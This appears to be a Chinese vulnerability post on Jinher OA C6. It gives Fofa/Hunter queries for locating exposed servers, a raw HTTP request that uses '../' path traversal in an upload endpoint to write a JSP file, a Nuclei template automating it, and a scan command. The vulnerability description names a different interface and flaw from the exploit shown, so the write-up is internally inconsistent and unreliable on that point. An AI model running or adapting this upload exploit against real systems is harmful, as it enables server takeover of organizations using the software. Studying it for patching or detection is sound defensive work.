【产品介绍】
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。
【漏洞介绍】
金和OA sap-b1config-aspx接口存在未授权,攻击者可通过此漏洞获取敏感信息。
【资产测绘Query】
Fofa语法:app=”金和网络-金和OA”
Hunter语法:app.name=”金和 OA”

【产品界面】

【漏洞复现】
POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1Host: 127.0.0.1Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: closeContent-Length: 444------WebKitFormBoundary5iALAXlSiqxJXrhKContent-Disposition: form-data; name="filename"../../../../upload/123.jsp------WebKitFormBoundary5iALAXlSiqxJXrhKContent-Disposition: form-data; name="upLoadFile"; filename="a.jpg"Content-Type: image/jpeg<% out.println("Hello, World!"); %>------WebKitFormBoundary5iALAXlSiqxJXrhKContent-Disposition: form-data; name="Submit"upload------WebKitFormBoundary5iALAXlSiqxJXrhK--

成功上传,访问路径upload/123.jsp

【Nuclei-Poc】
id: example-file-uploadinfo:name: Example File Uploadauthor: your-nameseverity: highrequests:- raw:- |POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1Host: {{Hostname}}Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close------WebKitFormBoundary5iALAXlSiqxJXrhKContent-Disposition: form-data; name="filename"../../../../upload/test.jsp------WebKitFormBoundary5iALAXlSiqxJXrhKContent-Disposition: form-data; name="upLoadFile"; filename="test.jpg"Content-Type: image/jpeg<% out.println("Hello, World!"); %>------WebKitFormBoundary5iALAXlSiqxJXrhKContent-Disposition: form-data; name="Submit"upload------WebKitFormBoundary5iALAXlSiqxJXrhK--- |GET /upload/test.jsp HTTP/1.1Host: {{Hostname}}Accept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67matchers-condition: andmatchers:- type: wordwords:- "Hello, World!"part: body- type: statusstatus:- 200
【验证】
.\nuclei -l 1.txt -t 6.yaml

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。